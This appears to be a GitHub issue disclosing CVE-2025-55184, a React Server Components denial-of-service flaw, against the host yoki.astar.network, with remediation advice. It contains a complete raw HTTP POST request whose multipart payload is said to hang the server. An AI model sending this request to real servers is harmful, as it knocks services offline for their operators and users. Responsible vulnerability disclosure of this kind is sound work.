Skip to content

React Server Components - Denial of Service [CVE-2025-55184] on yoki.astar.network #1607

@new-one-050

Description

@new-one-050

Hello,
React Server Components 19.0.0 to 19.2.1 including react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack contain an insecure deserialization vulnerability caused by unsafe payload deserialization in Server Function endpoints, letting unauthenticated attackers cause denial of service by hanging the server process with a single HTTP request.

Steps to reproduce:

  • Please send the following request:
POST / HTTP/1.1
Host: yoki.astar.network
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
Content-Length: 151

-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="0"

"$@0"
-----------------------------735323031399963166993862150--

Proof of concept:

Image

Remediation:

  • Update to the latest version that fixes the unsafe deserialization issue.

Reference:

Impact

Unauthenticated attackers can cause denial of service by hanging the server process with a single HTTP request.

Thanks and have a good day!

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions